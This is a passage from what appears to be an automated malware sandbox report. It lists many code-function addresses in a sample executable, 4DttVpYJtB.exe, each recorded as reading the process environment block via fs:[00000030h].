            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37033640 mov eax, dword ptr fs:[00000030h]4_2_37033640
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704F640 mov eax, dword ptr fs:[00000030h]4_2_3704F640
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704F640 mov eax, dword ptr fs:[00000030h]4_2_3704F640
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704F640 mov eax, dword ptr fs:[00000030h]4_2_3704F640
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702D64A mov eax, dword ptr fs:[00000030h]4_2_3702D64A
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702D64A mov eax, dword ptr fs:[00000030h]4_2_3702D64A
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37065654 mov eax, dword ptr fs:[00000030h]4_2_37065654
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703965A mov eax, dword ptr fs:[00000030h]4_2_3703965A
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703965A mov eax, dword ptr fs:[00000030h]4_2_3703965A
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37027662 mov eax, dword ptr fs:[00000030h]4_2_37027662
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37027662 mov eax, dword ptr fs:[00000030h]4_2_37027662
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37027662 mov eax, dword ptr fs:[00000030h]4_2_37027662
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37043660 mov eax, dword ptr fs:[00000030h]4_2_37043660
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37043660 mov eax, dword ptr fs:[00000030h]4_2_37043660
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37043660 mov eax, dword ptr fs:[00000030h]4_2_37043660
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B166E mov eax, dword ptr fs:[00000030h]4_2_370B166E
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B166E mov eax, dword ptr fs:[00000030h]4_2_370B166E
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B166E mov eax, dword ptr fs:[00000030h]4_2_370B166E
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C5660 mov eax, dword ptr fs:[00000030h]4_2_370C5660
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370EF68C mov eax, dword ptr fs:[00000030h]4_2_370EF68C
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370AD69D mov eax, dword ptr fs:[00000030h]4_2_370AD69D
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705D6D0 mov eax, dword ptr fs:[00000030h]4_2_3705D6D0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370296E0 mov eax, dword ptr fs:[00000030h]4_2_370296E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370296E0 mov eax, dword ptr fs:[00000030h]4_2_370296E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370356E0 mov eax, dword ptr fs:[00000030h]4_2_370356E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370356E0 mov eax, dword ptr fs:[00000030h]4_2_370356E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370356E0 mov eax, dword ptr fs:[00000030h]4_2_370356E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C56E0 mov eax, dword ptr fs:[00000030h]4_2_370C56E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C56E0 mov eax, dword ptr fs:[00000030h]4_2_370C56E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702B502 mov eax, dword ptr fs:[00000030h]4_2_3702B502
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370E550D mov eax, dword ptr fs:[00000030h]4_2_370E550D
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370E550D mov eax, dword ptr fs:[00000030h]4_2_370E550D
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370E550D mov eax, dword ptr fs:[00000030h]4_2_370E550D
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37051514 mov eax, dword ptr fs:[00000030h]4_2_37051514
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37051514 mov eax, dword ptr fs:[00000030h]4_2_37051514
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37051514 mov eax, dword ptr fs:[00000030h]4_2_37051514
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37051514 mov eax, dword ptr fs:[00000030h]4_2_37051514
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37051514 mov eax, dword ptr fs:[00000030h]4_2_37051514
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37051514 mov eax, dword ptr fs:[00000030h]4_2_37051514
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DF51B mov eax, dword ptr fs:[00000030h]4_2_370DF51B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DF51B mov eax, dword ptr fs:[00000030h]4_2_370DF51B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DF51B mov eax, dword ptr fs:[00000030h]4_2_370DF51B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DF51B mov eax, dword ptr fs:[00000030h]4_2_370DF51B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DF51B mov eax, dword ptr fs:[00000030h]4_2_370DF51B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DF51B mov eax, dword ptr fs:[00000030h]4_2_370DF51B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DF51B mov ecx, dword ptr fs:[00000030h]4_2_370DF51B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DF51B mov ecx, dword ptr fs:[00000030h]4_2_370DF51B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DF51B mov eax, dword ptr fs:[00000030h]4_2_370DF51B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DF51B mov eax, dword ptr fs:[00000030h]4_2_370DF51B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DF51B mov eax, dword ptr fs:[00000030h]4_2_370DF51B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DF51B mov eax, dword ptr fs:[00000030h]4_2_370DF51B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DF51B mov eax, dword ptr fs:[00000030h]4_2_370DF51B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37061527 mov eax, dword ptr fs:[00000030h]4_2_37061527
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3706F523 mov eax, dword ptr fs:[00000030h]4_2_3706F523
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37033536 mov eax, dword ptr fs:[00000030h]4_2_37033536
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37033536 mov eax, dword ptr fs:[00000030h]4_2_37033536
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702753F mov eax, dword ptr fs:[00000030h]4_2_3702753F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702753F mov eax, dword ptr fs:[00000030h]4_2_3702753F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702753F mov eax, dword ptr fs:[00000030h]4_2_3702753F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3710B55F mov eax, dword ptr fs:[00000030h]4_2_3710B55F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3710B55F mov eax, dword ptr fs:[00000030h]4_2_3710B55F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B9567 mov eax, dword ptr fs:[00000030h]4_2_370B9567
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37069580 mov eax, dword ptr fs:[00000030h]4_2_37069580
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37069580 mov eax, dword ptr fs:[00000030h]4_2_37069580
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370EF582 mov eax, dword ptr fs:[00000030h]4_2_370EF582
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370D7591 mov edi, dword ptr fs:[00000030h]4_2_370D7591
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F5C7 mov eax, dword ptr fs:[00000030h]4_2_3702F5C7
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F5C7 mov eax, dword ptr fs:[00000030h]4_2_3702F5C7
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F5C7 mov eax, dword ptr fs:[00000030h]4_2_3702F5C7
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F5C7 mov eax, dword ptr fs:[00000030h]4_2_3702F5C7
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F5C7 mov eax, dword ptr fs:[00000030h]4_2_3702F5C7
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F5C7 mov eax, dword ptr fs:[00000030h]4_2_3702F5C7
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F5C7 mov eax, dword ptr fs:[00000030h]4_2_3702F5C7
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F5C7 mov eax, dword ptr fs:[00000030h]4_2_3702F5C7
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F5C7 mov eax, dword ptr fs:[00000030h]4_2_3702F5C7
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370BB5D3 mov eax, dword ptr fs:[00000030h]4_2_370BB5D3
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703B5E0 mov eax, dword ptr fs:[00000030h]4_2_3703B5E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703B5E0 mov eax, dword ptr fs:[00000030h]4_2_3703B5E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703B5E0 mov eax, dword ptr fs:[00000030h]4_2_3703B5E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703B5E0 mov eax, dword ptr fs:[00000030h]4_2_3703B5E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703B5E0 mov eax, dword ptr fs:[00000030h]4_2_3703B5E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703B5E0 mov eax, dword ptr fs:[00000030h]4_2_3703B5E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370615EF mov eax, dword ptr fs:[00000030h]4_2_370615EF
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B55E0 mov eax, dword ptr fs:[00000030h]4_2_370B55E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370EF409 mov eax, dword ptr fs:[00000030h]4_2_370EF409
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702B420 mov eax, dword ptr fs:[00000030h]4_2_3702B420
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B9429 mov eax, dword ptr fs:[00000030h]4_2_370B9429
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37067425 mov eax, dword ptr fs:[00000030h]4_2_37067425
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37067425 mov ecx, dword ptr fs:[00000030h]4_2_37067425
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370BF42F mov eax, dword ptr fs:[00000030h]4_2_370BF42F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370BF42F mov eax, dword ptr fs:[00000030h]4_2_370BF42F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370BF42F mov eax, dword ptr fs:[00000030h]4_2_370BF42F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370BF42F mov eax, dword ptr fs:[00000030h]4_2_370BF42F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370BF42F mov eax, dword ptr fs:[00000030h]4_2_370BF42F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370CB420 mov eax, dword ptr fs:[00000030h]4_2_370CB420
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370CB420 mov eax, dword ptr fs:[00000030h]4_2_370CB420
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370ED430 mov eax, dword ptr fs:[00000030h]4_2_370ED430
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370ED430 mov eax, dword ptr fs:[00000030h]4_2_370ED430
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3706D450 mov eax, dword ptr fs:[00000030h]4_2_3706D450
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3706D450 mov eax, dword ptr fs:[00000030h]4_2_3706D450
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703D454 mov eax, dword ptr fs:[00000030h]4_2_3703D454
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703D454 mov eax, dword ptr fs:[00000030h]4_2_3703D454
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703D454 mov eax, dword ptr fs:[00000030h]4_2_3703D454
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703D454 mov eax, dword ptr fs:[00000030h]4_2_3703D454
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703D454 mov eax, dword ptr fs:[00000030h]4_2_3703D454
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703D454 mov eax, dword ptr fs:[00000030h]4_2_3703D454
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370EF478 mov eax, dword ptr fs:[00000030h]4_2_370EF478
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3706B490 mov eax, dword ptr fs:[00000030h]4_2_3706B490
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3706B490 mov eax, dword ptr fs:[00000030h]4_2_3706B490
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370BD4A0 mov ecx, dword ptr fs:[00000030h]4_2_370BD4A0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370BD4A0 mov eax, dword ptr fs:[00000030h]4_2_370BD4A0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370BD4A0 mov eax, dword ptr fs:[00000030h]4_2_370BD4A0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370E54B0 mov eax, dword ptr fs:[00000030h]4_2_370E54B0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370E54B0 mov ecx, dword ptr fs:[00000030h]4_2_370E54B0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370514C9 mov eax, dword ptr fs:[00000030h]4_2_370514C9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370514C9 mov eax, dword ptr fs:[00000030h]4_2_370514C9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370514C9 mov eax, dword ptr fs:[00000030h]4_2_370514C9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370514C9 mov eax, dword ptr fs:[00000030h]4_2_370514C9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370514C9 mov eax, dword ptr fs:[00000030h]4_2_370514C9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705F4D0 mov eax, dword ptr fs:[00000030h]4_2_3705F4D0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705F4D0 mov eax, dword ptr fs:[00000030h]4_2_3705F4D0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705F4D0 mov eax, dword ptr fs:[00000030h]4_2_3705F4D0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705F4D0 mov eax, dword ptr fs:[00000030h]4_2_3705F4D0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705F4D0 mov eax, dword ptr fs:[00000030h]4_2_3705F4D0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705F4D0 mov eax, dword ptr fs:[00000030h]4_2_3705F4D0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705F4D0 mov eax, dword ptr fs:[00000030h]4_2_3705F4D0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705F4D0 mov eax, dword ptr fs:[00000030h]4_2_3705F4D0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705F4D0 mov eax, dword ptr fs:[00000030h]4_2_3705F4D0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370654E0 mov eax, dword ptr fs:[00000030h]4_2_370654E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370EF4FD mov eax, dword ptr fs:[00000030h]4_2_370EF4FD
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370594FA mov eax, dword ptr fs:[00000030h]4_2_370594FA
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37029303 mov eax, dword ptr fs:[00000030h]4_2_37029303
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37029303 mov eax, dword ptr fs:[00000030h]4_2_37029303
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370EF30A mov eax, dword ptr fs:[00000030h]4_2_370EF30A
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B330C mov eax, dword ptr fs:[00000030h]4_2_370B330C
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B330C mov eax, dword ptr fs:[00000030h]4_2_370B330C
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B330C mov eax, dword ptr fs:[00000030h]4_2_370B330C
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B330C mov eax, dword ptr fs:[00000030h]4_2_370B330C
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37103336 mov eax, dword ptr fs:[00000030h]4_2_37103336
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705332D mov eax, dword ptr fs:[00000030h]4_2_3705332D
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703B360 mov eax, dword ptr fs:[00000030h]4_2_3703B360
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703B360 mov eax, dword ptr fs:[00000030h]4_2_3703B360
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703B360 mov eax, dword ptr fs:[00000030h]4_2_3703B360
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703B360 mov eax, dword ptr fs:[00000030h]4_2_3703B360
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703B360 mov eax, dword ptr fs:[00000030h]4_2_3703B360
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703B360 mov eax, dword ptr fs:[00000030h]4_2_3703B360
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37031380 mov eax, dword ptr fs:[00000030h]4_2_37031380
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37031380 mov eax, dword ptr fs:[00000030h]4_2_37031380
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37031380 mov eax, dword ptr fs:[00000030h]4_2_37031380
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37031380 mov eax, dword ptr fs:[00000030h]4_2_37031380
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37031380 mov eax, dword ptr fs:[00000030h]4_2_37031380
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704F380 mov eax, dword ptr fs:[00000030h]4_2_3704F380
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704F380 mov eax, dword ptr fs:[00000030h]4_2_3704F380
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704F380 mov eax, dword ptr fs:[00000030h]4_2_3704F380
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704F380 mov eax, dword ptr fs:[00000030h]4_2_3704F380
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704F380 mov eax, dword ptr fs:[00000030h]4_2_3704F380
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704F380 mov eax, dword ptr fs:[00000030h]4_2_3704F380
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370EF38A mov eax, dword ptr fs:[00000030h]4_2_370EF38A
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370D1390 mov eax, dword ptr fs:[00000030h]4_2_370D1390
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370D1390 mov eax, dword ptr fs:[00000030h]4_2_370D1390
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370393A6 mov eax, dword ptr fs:[00000030h]4_2_370393A6
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370393A6 mov eax, dword ptr fs:[00000030h]4_2_370393A6
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370633D0 mov eax, dword ptr fs:[00000030h]4_2_370633D0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370BB214 mov eax, dword ptr fs:[00000030h]4_2_370BB214
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370BB214 mov eax, dword ptr fs:[00000030h]4_2_370BB214
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370F124C mov eax, dword ptr fs:[00000030h]4_2_370F124C
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370F124C mov eax, dword ptr fs:[00000030h]4_2_370F124C
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370F124C mov eax, dword ptr fs:[00000030h]4_2_370F124C
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370F124C mov eax, dword ptr fs:[00000030h]4_2_370F124C
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370EF247 mov eax, dword ptr fs:[00000030h]4_2_370EF247
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705F24A mov eax, dword ptr fs:[00000030h]4_2_3705F24A
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370AD250 mov eax, dword ptr fs:[00000030h]4_2_370AD250
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370AD250 mov ecx, dword ptr fs:[00000030h]4_2_370AD250
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702B273 mov eax, dword ptr fs:[00000030h]4_2_3702B273
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702B273 mov eax, dword ptr fs:[00000030h]4_2_3702B273
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702B273 mov eax, dword ptr fs:[00000030h]4_2_3702B273
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C327E mov eax, dword ptr fs:[00000030h]4_2_370C327E
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C327E mov eax, dword ptr fs:[00000030h]4_2_370C327E
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C327E mov eax, dword ptr fs:[00000030h]4_2_370C327E
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C327E mov eax, dword ptr fs:[00000030h]4_2_370C327E
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C327E mov eax, dword ptr fs:[00000030h]4_2_370C327E
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C327E mov eax, dword ptr fs:[00000030h]4_2_370C327E
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370ED270 mov eax, dword ptr fs:[00000030h]4_2_370ED270
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37037290 mov eax, dword ptr fs:[00000030h]4_2_37037290
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37037290 mov eax, dword ptr fs:[00000030h]4_2_37037290
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37037290 mov eax, dword ptr fs:[00000030h]4_2_37037290
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370EF2AE mov eax, dword ptr fs:[00000030h]4_2_370EF2AE
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370F92AB mov eax, dword ptr fs:[00000030h]4_2_370F92AB
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3710B2BC mov eax, dword ptr fs:[00000030h]4_2_3710B2BC
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3710B2BC mov eax, dword ptr fs:[00000030h]4_2_3710B2BC
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3710B2BC mov eax, dword ptr fs:[00000030h]4_2_3710B2BC
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3710B2BC mov eax, dword ptr fs:[00000030h]4_2_3710B2BC
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370292AF mov eax, dword ptr fs:[00000030h]4_2_370292AF
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370532C5 mov eax, dword ptr fs:[00000030h]4_2_370532C5
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370632C0 mov eax, dword ptr fs:[00000030h]4_2_370632C0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370632C0 mov eax, dword ptr fs:[00000030h]4_2_370632C0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_371032C9 mov eax, dword ptr fs:[00000030h]4_2_371032C9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370272E0 mov eax, dword ptr fs:[00000030h]4_2_370272E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702D2EC mov eax, dword ptr fs:[00000030h]4_2_3702D2EC
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702D2EC mov eax, dword ptr fs:[00000030h]4_2_3702D2EC
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705510F mov eax, dword ptr fs:[00000030h]4_2_3705510F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705510F mov eax, dword ptr fs:[00000030h]4_2_3705510F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705510F mov eax, dword ptr fs:[00000030h]4_2_3705510F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705510F mov eax, dword ptr fs:[00000030h]4_2_3705510F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705510F mov eax, dword ptr fs:[00000030h]4_2_3705510F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705510F mov eax, dword ptr fs:[00000030h]4_2_3705510F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705510F mov eax, dword ptr fs:[00000030h]4_2_3705510F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705510F mov eax, dword ptr fs:[00000030h]4_2_3705510F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705510F mov eax, dword ptr fs:[00000030h]4_2_3705510F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705510F mov eax, dword ptr fs:[00000030h]4_2_3705510F
